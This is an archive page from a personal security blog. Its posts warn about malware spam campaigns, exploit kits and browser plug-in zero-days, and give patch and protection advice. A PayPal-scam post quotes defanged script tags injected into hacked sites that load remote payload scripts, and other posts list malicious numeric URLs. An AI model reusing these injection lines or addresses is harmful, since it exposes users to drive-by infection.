Wiz's Computer and Website Security Blog

August 31, 2020

Today, I received an email with the subject plainly marked as [SPAM] by Spam Assassin. The rest of the subject read as follows:

RE: DHL单号 Shipment Delivery Air Waybill no 6979374150

Note that it begins with "RE:" followed by mention of the alleged shipping company and a waybill number. The From address falsely claimed to be "DHL Global Inc © " [email protected]. The message body started off with the following plain text...

Dear customer,

Please find the attached Air Shipping Waybill Documents mentioned above that just arrived.

Immediately after this text there was an embedded blurry image purporting to be a scan of a waybill of a shipment from China. Directly under this faked waybill was the following footer...

DHL-Sinotrans International Air Courier Ltd.

No.55 Songshan Rd, Suzhou 215129, China
Phone:+86(512)66892059-5205
Internal VoIP Phone:809-5605
Fax:+86(512)66750262
[email protected]
www.cn.dhl.com
GO GREEN - Environmental protection with DHL
Please consider your environmental responsibility before printing this email.

Continue reading "Fake DHL shipping waybill email attachment contains the Qbot spyware Trojan" »

Posted by Wiz at 9:23 PM | Permalink

back to top ^

November 12, 2016

Since the first week of November there has been a virtual flood of malicious email scams that have Ransomware in both .doc and .zip attachments.

The subjects vary from hour to hour and day to day. They include all of the following Subjects (with more to come):

1. Emailing: _[digits]_[more digits]


2. Virtual card


3. Order


4. "No subject"


5. [Scan] 2016-1111 11:45:05 (time and date varies)


6. Document from Paulette (name varies)


7. Receipt 6940-30676 (numbers vary)


8. unauthorized access


9. DSCF54499.pdf (numbers vary and is really a zip file)


10. DSCF54499.tiff (numbers vary and is really a zip file)


11. DSCF54499.gif (numbers vary and is really a zip file)


12. Account temporarily suspended


13. Your Amazon.com order has dispatched (#890-6219873-3176850) (numbers vary)


14. Your parcel has arrived


15. Statement


16. Suspicious movements


17. We could not deliver your parcel, #0000331783 (numbers vary)


18. Financial documents

The file sizes of these messages varies between about 3kb, up to about 15kb for zip files and over 200 kb for office documents, which contain a diversionary document that opens as the Trojan is downloaded in the background. The most common file sizes range from 10.5 to 12.5 kb for the zip files.

Some of these scams contain specially crafted wording to try to trick busy office workers to open the attachments. Others had nothing visible, other than the paperclip indicating that there was an attachment.

All of these attachments contain either JavaScript (.js), or Windows Script File (.wsf) inside a zip file, or Office Macro scripts inside a .doc or .docx file to force a download of a Trojan Horse file known as the Locky Ransomware. An unprotected Windows computer could be automatically infected by opening and unzipping the zip files, or by enabling Macros in MS Word, or in any other .doc reader that uses the MS Word Macro script language.

I want to point out that if you use Trend Micro Internet Security (any flavor), you are protected against these scams and Ransomware threats. I use Trend Micro and pay by the year. I feel it is well worth the money for the peace of mind.

Posted by Wiz at 4:08 PM | Permalink

back to top ^

January 22, 2015

There is a brand new Flash Player zero day vulnerability being exploited in the wild, by the so-called "Angler" Exploit Kit. It is being used to silently install the "Bedep" click fraud Trojan. The information about this was first released on Jan 21, 2015, by a security researcher using the moniker: Kafeine.

Early information suggested that only Windows operating system users running Internet Explorer were affected. This was because the criminals who released the exploit used a single wrong line of logic. That mistake was corrected later last night and the exploit now works on the latest version of Fire fox as well. Anybody browsing the Web running Internet Explorer or Firefox on the now unsupported Windows XP is totally at risk.

According to Kafeine's research, the attack worked on all versions of Flash up to the then current 16.0.0.257. I say "then current" because this morning I learned that Adobe had released an update to Flash today, January 22, with version number 16.0.0.287. Unfortunately, that new version does not close the vulnerability being exploited by the new Angler attack. It does however close a related exploit and should be applied ASAP. Flash updates are listed on the official Adobe Flash "About Flash" page, which also has a link to the official Adobe Flash Download page. I recommend that all Windows users bookmark these pages and visit them often.

What operating systems and browsers are vulnerable today?

Any version of Internet Explorer or Firefox with any version of Windows will get owned if Flash up to 16.0.0.287 (included) is installed and enabled.

What's not affected (yet)?

Google Chrome browsers are neither targeted by name, not exploited when subjected to the malicious Flash applet.

Update 1, Jan 23, 2015 (Noon EST -0500)
Two days have gone by since the initial release of the information about this zero day exploit and I just checked the Adobe Flash Player "About Flash Player" page and found no new updates. They are still sitting at version 16.0.0.287 (released on the 22nd), which is totally exploitable. All target browsers are still vulnerable.

Update 2, Jan 23, 2015 (12:05PM EST)
I just read this security bulletin on Abobe.com.

A Security Advisory (APSA15-01) has been published regarding a critical vulnerability (CVE-2015-0311) in Adobe Flash Player 16.0.0.287 and earlier versions for Windows, Macintosh and Linux. We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8 and below.

Adobe expects to have a patch available for CVE-2015-0311 during the week of January 26.

The above confirms that the zero day Angler Flash exploit attacks are also able to infect Macintosh and Linux computers with Flash installed and enabled to run automatically in the browser being used (except Chrome).

Update 3, Jan 26, 2015
Adobe has silently began pushing out a patched version of Flash Player to fix the final 0-day vulnerability in this exploit kit campaign. The newest version is 16.0.0.296. However, the only way you will receive it is if you have set your Flash Player advanced options to automatically check for (and install) updates. Running a manual check takes you to the About Flash Player page, where as of 12:30 pm EST the current version was still listed as 16.0.0.287. The new patched version will be made available for manual downloading starting later today and throughout this week.

I also fixed some typos that I missed earlier.

What you can do now to protect your computers from the exploit kit.

Continue reading "New Flash Player zero day exploit in the wild" »

Posted by Wiz at 1:36 PM | Permalink

back to top ^

April 18, 2013

In the early hours of April 17, 2013, I published an article detailing an email scam using the Boston bombings as the lure to attack computers with malware. Today, that scam has switched to referring to the fertilizer plant explosion in Waco West, Texas, in the evening of April 17. The links and landing pages are the same as yesterday's.

In today's email attacks, the Subjects have been changed to refer to the Waco explosion in this fashion:

Waco Explosion HD

CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas

Raw: Texas Explosion Injures Dozens

Runner captures. Marathon Explosion

The message bodies still only contain a numeric hyperlink, in plain text. The format of these links is as follows (deactivated for your safety):

h**p://95.87.6.156/news.html

All of today's links have 4 part numeric IP addresses, followed by "/news.html" as of this writing. But, that file name has been changed to "/texas.html" in some recent messages.

Continue reading "Boston bombing email scams morph into Waco explosion scams" »

Posted by Wiz at 10:46 AM | Permalink

back to top ^

April 17, 2013

Tonight, I discovered a new malware attack tactic in the MailWasher Pro Recycle Bin. It was automatically deleted because it matched the conditions I created in a filter I call Exploit Link. In this case, the filter was matched by a numeric IP in the URL, instead of a domain name. Numeric URLs, especially those ending with a .htm or .html file are hostile 99.999999999% of the time. This one sure was.

The email arrived very late, at about 1 AM, Eastern time. Its sender was nobody I know, but it contained this enticing subject:

Explosion at the Boston Marathon

The total content in the message body was only a link, in this (deactivated) form:

h**p://178.137.100.12/news.html     (Don't go there!)

UPDATE; April 17, 2013, at 2:55 PM EDT:

I have now discovered some new numeric links containing the file name "/boston.html" - leading to exploit pages.

This is what is known as a numeric URL or hyperlink. It does not point to any known or registered domain name, just to an IP address. Spammers have set up a malicious web page on some compromised computer or hand held smart device that has been assigned a static IP address (usually by their broadband Internet service provider). In this case, the IP 178.137.100.12 is assigned to a "Kyivstar" GSM mobile broadband customer in Kiev, Ukraine. That IP address is already listed on my Russian Blocklist, under the CIDR 178.137.0.0/16.

UPDATE:
All of the links I have found in these email scams are leading to computers or devices located in Russia, Bulgaria, Latvia, or The Ukraine. This is an attack hosted by criminals based in the Former Soviet Union.

What awaits you at this numeric URL, ending in the file named: news.html?

Continue reading "Malware scammers exploiting Boston bomb tragedy by email" »

Posted by Wiz at 1:21 AM | Permalink

back to top ^

January 17, 2013

It was 5 days and a few hours ago that I published a blog article about a recent Java vulnerability being exploited in the wild. In it I advised my readers to disable Java plug-ins from running in their browsers, or to uninstall Java altogether.

Then, three days later, on Jan 14, 2013, Oracle, the keeper and maintainer of the Java code, released an out-of-band patch to plug the vulnerability that was the cause of the exploits. This was done with the release of Java 7 update 11.

However, on Wednesday, Jan 16, 2013, Trend Micro researchers posted findings that revealed that the Oracle patch was incomplete and left a related attack vector open. A few hours later, a high ranking admin on a malware distribution forum offered to sell a working exploit of this new zero day exploit for a starting bid of $5,000 USD (see Brian Krebs' article), to two more individuals (he had already sold one copy). Within a short time his offer was taken down, leading Brian Krebs to postulate that the bidding had ended and all three copies of the hardened and ready to go exploit had been sold.

I know that there are some business programs and commercial web pages that operate with Java Applets, requiring users to have Java enabled in their browsers, and/or operating systems. These people cannot just uninstall Java hodge-podge. They want a workable method of keeping Java, but reducing their exposure to malware sneak attacks. Let's see if I can help a little.

Continue reading "Hello, another Java 0-day exploit has been revealed!" »

Posted by Wiz at 12:22 AM | Permalink

back to top ^

January 11, 2013

Once again, Oracle's Java software is in making security news for being exploited in most major exploit kits via a new zero-day vulnerability. A zero-day vulnerability is where a proof of concept exploit is disclosed before the software vendor has a chance to create a patch to block that attack vector. At this time, Oracle has not released a patched version of Java and there is no known workaround. The next regularly scheduled Java update is set for February 19, 2013.

UPDATE January 14, 2013

Oracle has just released an out-of-band sudden patch for the new vulnerability in its Java Virtual Machine. The patch is called Java 7 update 11, available here.

The most dangerous and exploited type of Java is the kind that is used as a "plug-in" for web browsers (Internet Explorer, Google Chrome, Firefox, Safari, Opera, etc.). You see, when you install Java on your computer or hand-held devices, it installs both as an executable package that can be used by desktop productivity and entertainment applications, and as a plug-in for each brand of web browser you have installed on that device. The browser plug-in is responsible for running Java Applets in your browser. These Applets are supposed to be contained within a programmed-in software boundary called a "sandbox" - but they are notorious for being exploited to jump out of the sandbox and into the operating system.

I should point out that Java has been one of the favorite targets of virus and malware exploit authors since the year 1998 (Strange Brew - first Java virus). Over the years Java has been deployed in more and more devices, to the point that Oracle, the current owner, claims that Java is installed on over 3 billion devices Worldwide. Chances seem reasonable that you are using one or more of those 3 billion devices.

Since Java itself can be installed and run on devices that are based on different operating systems, it can be used to download malware to any of those devices by simply detecting the operating system and downloading the appropriate binary program for exploiting it. The typical entry point for exploitation is a web browser. The method by which the browser is caused to run malicious codes can be clicking on obfuscated poisoned links in email scams, hidden "iframes" that draw the attack codes into otherwise legitimate websites (and your browser), or JavaScript redirects that were injected into the head or end sections of compromised web pages.

Java is exploited constantly, for both old and new versions and vulnerabilities, for at least three reasons: (1) It is found on 3 billion devices; (2) most people don't even know if they have Java installed on whatever devices they are using to connect to the Internet; (3) Oracle is very slow to patch Java vulnerabilities that they are notified about.

What you can do to protect your devices from Java exploits

Continue reading "Java is most exploited browser plug-in. Disable if not needed!" »

Posted by Wiz at 6:34 PM | Permalink

back to top ^

Christmas Eve, 2012

I want to alert my readers to a spam run I saw over the last couple of days and also explain what the purpose of the scam really is. This is a new variation of a long-running scam spoofing both your Post Office and a major brand courier service, leading directly to a malware attack.

This particular variant may well become the template for ongoing spam campaigns, if the success rate is high enough. Right now, 'tis the season to receive gifts and the bait in this email scam may well trap a lot of eager folks who just may be waiting for a promised delivery of a present or online purchase.

It starts with a message claiming to be from either "Worldwide Express Mail," or "Shipping Service," or "Postal Service," with an incomprehensible "tracking" or ID number as the subject. Most have this body text, or something almost the same as this:

Your parcel has arrived at the post office at December 20.Our courier
was unable to deliver the parcel to you.

To receive a parcel, please, go to the nearest our office and show
this receipt.

DOWNLOAD POSTAL RECEIPT

Best Regards, The FedEx Team.

Here is where wisdom and suspicion are your best friends. The message text contains horrible grammar, and both a reference to a "POSTAL RECEIPT" and to "FedEx." I hope that most of you are aware that FedEx is a courier service and is NOT associated with the "Postal Service," nor do they issue "Postal Receipts." You Country's official Postal Service does that. Yet, almost every email courier scam I have seen over the last year confuses at least two, if not three services: the US Postal Service (USPS), FedEx (a private company) and UPS (United Parcel Service).

If you receive one of these failed delivery scams and you see any sign of confusion about who was supposedly delivering the package, usually accompanied by bad grammar and sentence structure, delete it immediately.

So, if this is a scam, what is the payload and what is its purpose?

Continue reading "Anatomy of an email scam spoofing FedEx and Post Office" »

Posted by Wiz at 12:10 AM | Permalink

back to top ^

December 12, 2012

Today there is a new email scam run making the rounds, spoofing an Adobe order number and download link. The links are malicious, leading to the Blackhole Exploit Kit.

Details:

The email messages in question claim to come from [email protected]. But, so far, the sender's name is usually a capitalized first and sometimes also last name. This is not standard business practice and should be a dead giveaway that something is amiss. Nobody working at a major software company will spell their name with a caps!

The subjects thus-far have been: Order N(5 numbers)

The message body text begins with: "Good (day|morning),You can download your Adobe CS4 License here" - with a link around the word "here." If you read email on your computer you can hover your pointer over links to display the actual destination URL in a status bar that appears on the bottom of the email client. These poisoned links end with: /redirecting.htm - which is a commonly used page name for the Blackhole Exploit Kit. The landing page has the title: "Please wait" and the H1 heading: "Please wait a moment ... You will be forwarded... "

From that point onward, your browser is attacked with obfuscated JavaScript functions, probing for an exploitable version of Oracle Java or Adobe Flash, at the very least, and sometimes other vulnerable software. If you browse with Firefox, with the NoScript Add-on installed and active, set to its default security to disallow Java and JavaScript, unless you specifically allow it, you will not be exploited automatically. But, some attack kits also contain a manual link option that appears when people arrive with JavaScript disabled. If you are offered a manual link (on the page titled "Please wait" ... you will be forwarded) to install a "missing plug-in" (usually Java or Flash), refuse and close the page, then close the browser. Then update your security program and scan for threats that might have slipped in during the attack.

Unfortunately, many mobile phone users don't usually have this hover function that would alert them to poisoned links. You would have to be using a mobile browser or email reader that contains a hover to display function, or else pray that your device is not targeted by the exploit kit at the other end of the click.

Continue reading "Emails spoofing Adobe order numbers have links to Blackhole Exploit Kit" »

Posted by Wiz at 12:14 PM | Permalink

back to top ^

October 11, 2012

We are now 1/3 the way into October and there is no letup in the volume of malware infested email scams flooding our inboxes. When I refer to malware delivered via email, most of it is in the form of links to compromised websites that are hosting the Blackhole Exploit Kit and other similar badware.

Because of blogs like this one, many computer users are wary of clicking on links in unexpected emails. This is especially so if they have taken my advice and read the destination URL in the status bar of your email client, while hovering without clicking on links. The hovering typically causes the bottom status bar to (appear and) display the actual URL in any hidden HTML codes. This will contradict any fake anchor text, or the spoofed company's domain name, in of most spam emails that are written to trick unwary users into clicking without thinking it through.

For example, if an email claims to be from CNN Breaking News, yet, when you hover over the links the status bar shows something like the following, it is a spoofed link, probably leading to an exploit attack kit:

h**p://strange-domain.de/FME2kA9/index.html.

"Index.html" is a favorite file name for the Blackhole purveyors. A few use the variation index32.html, while another poisoned link template uses the destination file name: "forwarding.htm."

In order to attack the more cautious email readers who don't blindly click on links, some scams pack their malicious codes into attachments that the reader is encouraged to open. One usually sees these malware laden attachments in the emails that pretend to contain a (sometimes forwarded) scan from an HP ScanJet; like this example from earlier tonight: (Subject) Re: Fwd: Scan from a HP ScanJet #14191476. That email contained an attachment named: "HP_Document.zip" that when opened would exploit some vulnerable, unpatched software you might have installed (like an outdated version of Adobe Reader, Acrobat, or Flash), launching an exploit attack on the user's computer.

A third method of exploitation is by embedding hostile scripting and invisible iframes into .htm attachments. Recipients are then urged by the spammers to open those files in Internet Explorer. Doing so launches all of the Blackhole or Phoenix exploit codes that are normally served from remote, compromised websites, or hostile malware servers.

Continue reading "Malware links and attachments flooding email inboxes in October" »

Posted by Wiz at 1:03 AM | Permalink

back to top ^

September 17, 2012
(Updated Sept 19, 2012, to include IE 6, plus tightening the security level of IE browsers)

The security channels are buzzing today with news about a brand new "zero-day" vulnerability in Internet Explorer browsers 6, 7, 8 and 9, which is actively being exploited to load the Poison Ivy Trojan onto victimized computers.

Details are still emerging about the exact method through which Internet Explorer is being exploited. However, one common factor is that the current exploit requires Adobe Flash to also be installed. The term "Heap Spray" is being used to describe the code injection action which leads to the downloading of a Shockwave Flash file by loading an invisible iframe into the browser. The Flash file it downloads then downloads and executes a file which installs the Poison Ivy Trojan.

NEW
A successful exploit of Windows Vista or Windows 7 also requires a vulnerable version of Java to be installed.

All of this happens behind the scenes and runs with the full privileges of the logged in user. This means that if you are lured to this trap and are operating with Administrator privileges and are browsing with Internet Explorer 6 through 9, your fully patched Windows PC may have the Poison Ivy, or some other Trojan silently installed right in front of you.

People who log in to less privileged account types will have to approve the malware installation and provide Admin credentials. While they might be tricked by crafty language, it is less likely that most of them will be fooled. FWIIW, I operate as a Power User (Win XP) and Standard User in Windows 7. Both are less privileged accounts.

Continue reading "New zero-day vulnerability in Internet Explorer being actively exploited" »

Posted by Wiz at 11:14 PM | Permalink

back to top ^

September 15, 2012

Many of my blog articles involve warnings about vulnerabilities in Java plug-ins for browsers. Criminals love Java because it has so many exploitable code issues that as soon as one is fixed, another is discovered. Successful exploits cause malicious code to jump out of the Java "sandbox" and into your operating system. Security bloggers like me are always advising our readers to uninstall Java for their safety and many are heeding this advice.

If you ready security blogs, like this one, you will often see the term "exploit kit." Usually, we discuss the most common exploit kit in use these days: "The BlackHole Exploit Kit." It is expensive, but gets incredible results because it targets the most recent vulnerabilities found in Java technology. Victims are lured to exploit kits by links in spam emails, or on compromised websites. However, if a potential victim arrives and does not have Java installed, a Java only exploit kit fails to infect that person's computer.

As a backup plan, some exploit kits also test for the presence of Adobe Flash, or Reader, or Acrobat. If any of these are installed and are not the latest, patched version, the computer may be taken over through those plug-ins. But, if the victim's computer is fully patched and is not running Java at all, some exploit writers (Crime Boss Exploit Kit) have found a way to get one more crack at you before letting you move along. How? They tell you that Java is required to view the important details on the (exploit) page and provide a download link to you! Clicking on the download link results in an unsigned certificate alert popping up, warning that you may be downloading harmful software (Windows PCs).

Continue reading "Exploit kit offers to install Java if you don't already have it" »

Posted by Wiz at 10:19 AM | Permalink

back to top ^

August 22, 2012

August has been a busy month for both cyber criminals and security patches from software vendors targeted by malware distributors. Microsoft released 9 security patches through its monthly Patch Tuesday, on August 14, 2012. The same day, Adobe released a new version of its Flash Player, to plug a vulnerability being exploited in the wild. Earlier today, Adobe released yet another version of Flash Player, fixing six more vulnerabilities.

These updates are all rated either "critical," or "Important" by their owners. You are strongly advised to update your Windows computers, via the links on your Start Menu for Windows or Microsoft Update, plus all installed Adobe programs, but especially Flash and AIR. Today's updates bring Flash to version 11.4.402.265 for most browsers, except for Google Chrome. Its new version is bundled into a newly released version of Chrome and holds version number 11.3.31.230. This applies to Windows and Mac computers.

To find out if you are running the current version, or an out-dated version of Flash, go to the Adobe "About Flash" page.

Continue reading "Roundup of recently patched Internet security vulnerabilities" »

Posted by Wiz at 12:31 PM | Permalink

back to top ^

July 18, 2012

After a week where spam for pharmaceuticals, fake diplomas and replica watches dominated inboxes and junk folders, malware scams have resumed with a vengeance. These are spam email messages that either contain malware in an attached zip file, or a link to a malware server.

The recent email malware scams I saw, over the last 7 days, are spoofing the following brands or senders with these subjects:

UPS: "UPS Tracking Number H8087145257" - "UPS Tracking Number H1284336147"
UPS and USPS together: "Your Tracking Number H6497226598"
Sprint: "Your Sprint bill is now available online"
LinkedIn: "Join My Network on LinkedIn"
US Air: "Fwd: Your Flight US 896-119520"
Bank Account Operator: "Fwd: Wire Transfer Confirmation (FED_2732L45075)"
LiveJournal.com (UPS spoof): "Your Tracking Number H6302300603"
Post Express: "Delivery status is required urgent confirmation"
LinkedIn (UPS and USPS): "United Postal Service Tracking Nr. H9486128170"
Customer Support ups: "UPS Tracking Number H7383353854"
Habbo Hotel: "UPS: Your Package H4869590295"

As you can see, scams spoofing UPS and the USPS are the most common at this time. All of the above scams either contain malware exploit codes in an attachment (e.g. "MYUPS_N230250.zip"), or at the end of a redirected link to a BlackHole Exploit Kit server. Both methods use JavaScript codes to probe your web browser or email client for vulnerabilities, or exploitable plug-ins/extensions, or basic components. The ones being targeted the most this week are: Windows Help Center URL Validation Vulnerability, which was patched on July 13, 2010, as well as numerous vulnerabilities in the Java Virtual Machine, all of which have been patched by Oracle Java updates, plus the Microsoft XML Core Services Vulnerability just patched on July 10, 2012. Finally, some versions of the BlackHole Exploit Kit also probe for a vulnerable and exploitable version of Adobe's Reader. Acrobat and Flash software. Previous versions also sought to exploit Adobe Shockwave and Air.

Let's analyze one of the LinkedIn malware scams I received just today.

Continue reading "More BlackHole Exploit Kit attacks spoofing LinkedIn, UPS, USPS" »

Posted by Wiz at 2:43 PM | Permalink

back to top ^

July 2, 2012

On June 12, 2012 (Patch Tuesday), Microsoft published Security Advisory 2719615 that revealed an exploitable vulnerability in their XML Core Services, which are used by various Windows programs. Less than three weeks have passed since that Advisory and cyber-criminals have already added this vulnerability to the latest update of the BlackHole Exploit Kit.

Here is an excerpt form the Microsoft Techcenter article defining this vulnerability:

Microsoft is aware of active attacks that leverage a vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0. The vulnerability could allow remote code execution if a user views a specially crafted webpage using Internet Explorer.

The Advisory goes on to note the following details:

1. An attacker would have to trick users into visiting the BlackHole equipped website in order to run the exploit attack.
2. This is usually done by social engineering tactics used to trick victims into clicking on a hostile link, in an email message, or Instant Messenger, or Facebook or Twitter message, that redirects them to the attack code website.
3. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007.
4. The MSXML vulnerability inherits the privileges of the logged-in user. Less privileged accounts would be less likely to be infected, without further user interaction (like agreeing to a UAC challenge and allowing unknown, unexpected code to run with Administrator Privileges! DOH!)

Continue reading "Unpatched Microsoft XLM vulnerability now in BlackHole Exploit Kit" »

Posted by Wiz at 2:07 PM | Permalink

back to top ^

A few days ago I discovered an email scam that tries to directly deliver the BlackHole Exploit Kit to victims, inside the message body of those emails. The Subject used was: "Re: URGENT" and the sender addresses spoofed Twitter, LinkedIn and sbcglobal.net customers. In all cases, the hostile code was no longer reached via links, but simply by opening the email in your email client, with HTML display enabled and iframes allowed.

Rather than delving into a big technical discussion about the exploit itself (which I have covered numerous times), this article will attempt to help protect you from being exploited by it, or another like it.

We first need to define how the attack inside these email messages is triggered. This is accomplished by a two pronged attack. One is the exploit code itself is embedded inside the message body, inside <script> tag sets. The second is by means of an HTML "iframe" tag, with the "src" (source) being a remote server or website that is hosting the BlackHole attack kit.

The criminals that sent this to you are hoping to exploit you if your email reader is set to render HTML and scripting. Many users allow these things by default. The second method is used to attack you in the event you disallow scripting, but do allow iframe contents to be rendered. This is a tricky one-two punch.

Here are some ways you can protect your computers from being exploited by the embedded BlackHole attacks.

Continue reading "New email BlackHole exploit attack has embedded JavaScript & iframe" »

Posted by Wiz at 1:22 PM | Permalink

back to top ^

Earlier today I published a blog article detailing why Microsoft has issued an out-of-band patch that plugs a vulnerability used by the Flame malware, as one means of installing itself. Now, I have learned how the malware is exploiting these certificates and what the patch does to stop this method of exploitation.

According to recent analysis of the Flame malware, by Kaspersky Labs, one of the methods used by the Flame to propagate inside a network is to present a forged signed-by-Microsoft digital certificate when trying to install itself on an uninfected PC. The certificate is used to install a fake Windows Update component deceptively named "Desktop Gadget Platform" - which lies to you by claiming it: "Allows you to display gadgets on your desktop."

Because it uses a previously acceptable certificate of authenticity, claiming to have been signed by Microsoft itself, the operating system would allow the installation to take place without a second thought, or any user interaction. But, not any more! Today's critical patch KB2718704 has revoked the digital certificates used by the Flame Worm. Now, if this malware attempts to install, a challenge box will pop-up. It will list the installer as Unsigned or Untrusted, rather than Signed. If you check for a certificate, it will reveal that the certificate used has been revoked by the issuer.

Thus, The out-of-cycle patch that Microsoft released earlier today will block unattended infections that were previously allowed by the fraudulently signed (by Microsoft) certificates. These revocations will stop this attack vector, but not others. It is still unknown how the Flame malware is introduced into a system, to infect the first host. Researchers are currently looking for an unknown zero day exploit. Keep in mind that the forged signed certificates were a form of zero day attack. It took a long time for this vector to be discovered, but only hours to revoke their permissions and plug that hole.

Footnote: The digital certificates used to spread the Flame malware were signed in 2010. This subterfuge was only discovered in the last few days, a full two years after the fact. It is still not known how these fake certs were signed. That will eventually come to light, along with other facts about this new Flame malware burning up the security news channels as The Hot Topic (puns intended)!

My previous article urges all Windows computer owners and Admins to use Windows Update to install Patch KB2718704 as soon as possible. I repeat the call for urgency in patching against this new malware and others like it that are bound to follow. The next Flame might not be an espionage tool but a new form of botnet and attack weapon.

If you operate with less than Administrator privileges, the patch may be pushed to you when you shut down, or log off. If you run Microsoft Security Essentials, it runs with System privileges and may install the patch with no user interaction or restarts at all. It did just that on my XP Pro machine!

Posted by Wiz at 4:51 PM | Permalink

back to top ^

The Flame malware has been a hot topic for the last week, after it was discovered infecting industrial computer systems in the Middle East and Iran. This malware is very high level and is designed for spying on carefully selected industrial and Government systems. It has attracted a lot of attention in the short time it has been known to security companies, and today it got Microsoft's attention.

Today, June 4, 2012, Microsoft has issued an out-of-band patch for one of the vulnerabilities used by the Flame to infect Windows computers. Patch KB2718704 is now being pushed to all supported versions of Windows, via Windows Updates. I just applied it to my Windows 7 PC and it did not require a restart.

What vulnerability does patch 2718704 fix?

According to the aforementioned Microsoft Advisory, one of the infection vectors used by the Flame malware is exploiting an old feature belonging to Windows Terminal Services and used in Remote Desktop connections. Specifically, this is labeled: "Unauthorized Digital Certificates Could Allow Spoofing" - and is defined as follows:

"Microsoft is aware of active attacks using unauthorized digital certificates derived from a Microsoft Certificate Authority. An unauthorized certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks. This issue affects all supported releases of Microsoft Windows."

The advisory reveals that at least three unauthorized signed certificates are being used in the Flame attacks. Additionally, this patch addresses unauthorized digital certificates described in previous advisories: Microsoft Security Advisory 2524375, Microsoft Security Advisory 2607712, and Microsoft Security Advisory 2641690.

What does this patch do?

We (Microsoft) have updated the Untrusted Certificate Store to remove the trust in the affected Microsoft certification authorities.

Today's advisory goes on to urge all people running any supported version of Windows, including XP (w/SP 3), Vista, 7, Server 2003, to Server 2008, to run Windows Updates immediately, to install Patch KB2718704.

If the Flame is an industrial espionage Trojan, why should we all have to patch against it?

We have previous experience with another similar computer Worm, discovered in June 2010, which was also designed for industrial espionage. That Worm that was meant to only infect nuclear facilities in Iran, but accidentally broke loose and infected an untold number of business and personal computers around the world, none of which were its intended targets. That malware is known as the Stuxnet Worm and it is still infecting computer systems two years after being discovered.

So, while you and I are probably not an intended target of the Flame malware, now that is is loose, it is prudent that we apply the patch that blocks one of its most common methods of propagating. Go to Windows Updates on all of your Windows computers, check for patch KB2718704 and install it.

Posted by Wiz at 11:53 AM | Permalink

back to top ^

May 24, 2012

Cyber-criminals are once again ramping up their email scam campaigns to deliver messages with links to malware servers they control. One of the recent scams, happening this week, is a PayPal Payment scam, with links leading to an exploit attack kit.

The most recent PayPal scam arrives in your Inbox with the Subject: "You sent a payment" and a spoofed From address: "[email protected]" <[email protected]>. However, if you were to take a look at the actual normally hidden Header information, you would see that the email came from some other non-related website. The PayPal scam I am looking at came from Brazil:

Received: from [187.56.96.53] (helo=telesp.net.br).

See my article from 2006 for suggestions on how to display email headers.

The PayPal scam message body text is meant to both poke the curiosity of the recipient (by the dollar amount they allegedly sent) and to delay their checking into their PayPal accounts to see if they did make such a payment. Here is how the crooks accomplish these important tasks:

You sent a payment Transaction ID: 2T004487YM209135A
Dear PayPal User, You sent a payment for $334.85 USD to Otis Bauer (or another name). Please note that it may take a little while for this payment to appear in the Recent Activity list on your Account Overview...

This payment was sent using your bank account.By using your bank account to send money...

The call to action that they want victims to perform is NOT to login to their PayPal accounts to investigate this scam (See italicized sentence above), but to click on poisoned links provided amount keywords in the email message body. These inks are wrapped around every word that a PayPal user might normally expect to be available for seeing details about their accounts. The linked words were as follows:

• 2T004487YM209135A


• View the details of this transaction online


• Help Center | Resolution Center | Security Center


• h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_history (not URL in link)


• h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us (not URL in link)

Each one of the above anchor words were wrapped by a link to a compromised website that contained the following contents (placed there when they got hacked):

WAIT PLEASE
Loading...
<script type="text/javascript" src="h**p://REMOVED.com.tr/fu25e3pr/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED-epices.com/X1RrZw4G/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED.com.au/Xsqgw1AK/js.js"></script>


Continue reading "Anatomy of a PayPal email scam leading to malware" »

Posted by Wiz at 1:25 PM | Permalink

back to top ^

It appears that no matter how many cyber criminals get busted, or botnet command and control servers are taken offline, there is always another scam waiting to take their place. So it is in the case of email scams leading to malware attack kits.

The words and phrases in the subjects and message bodies used by scammers over the last few years has been morphing. We still see some of the old topics being used; recycled is a better word. But, new subjects and message bodies are being developed by clever copy writers who are employed by malware distributors. I want to share some of the recent social engineering topics and hook lines that I have seen in spam/scam emails that are detected by MailWasher Pro and subsequently reported to SpamCop.

The most recent scam is one I don't recall ever seeing before. It seems to target business owners who might hire accounting firms to take care of their books and taxes. It is a very clever scam, leading to huge exploit kit, containing over 18,000 bytes of JavaScript codes. Included are over 2 dozen script tags, most of which probe your browser and computer for exploitable plug-ins, like Java, Flash, Adobe Reader and Internet Explorer's ActiveX. If the victim's browser has any of the vulnerable versions of these plug-ins installed, silent exploits take place, resulting in the PC becoming a zombie in a spam and attack botnet. They are also treated to a free installation of a bank account stealing Trojan and maybe even a free scan from a fake anti-virus scanner that demands money to remove the fake detections and the barrage of warnings it fires at you.

Here then are the subjects and message contents of some email scams I analyzed today.

Continue reading "New social engineering tricks used in email malware scams" »

Posted by Wiz at 5:04 PM | Permalink

back to top ^

There is an ongoing spam campaign that I have been following since August 24 2011, pretending to be Facebook Friend Requests. However, all of the links contained in these scams lead to compromised websites, where your browser is attacked by criminal exploit kits, like the "Blackhole" or the "Nuclear" exploit kits.

If you are a member of Facebook and receive Friend Requests from senders with odd sounding names, you need to do something proactive before clicking on any links in those emails. You need to hover your mouse pointer over all buttons, images and text links, without pressing any mouse buttons (do not click!). Then, with your pointer over these links, look down at the "Status Bar" on the browser, or message window, or preview pane in the email client you are using, and look carefully at the URL being displayed.

The links and buttons in the Facebook Friend Request scams look like any other Facebook request, with a few exceptions. The photo of the alleged requester is missing, showing an outline of a shadowy head. When you hover over the picture, or name, or the Confirm Request buttons, or the Unsubscribe link, all of the links will be obviously fake, leading to anything other than facebook.com. Furthermore, for the last couple of months, the links are unbelievably huge, occupying multiple lines of codes. Herein lies the weakness in the scam.

Furthermore, Most of the scams spoofing facebook Friend Requests lack the line under their name, showing the person's statistics. E.g. 37 friends · 29 photos · 13 Wall posts. A real Friend Request contains these stats.

Making sense of what appears senseless
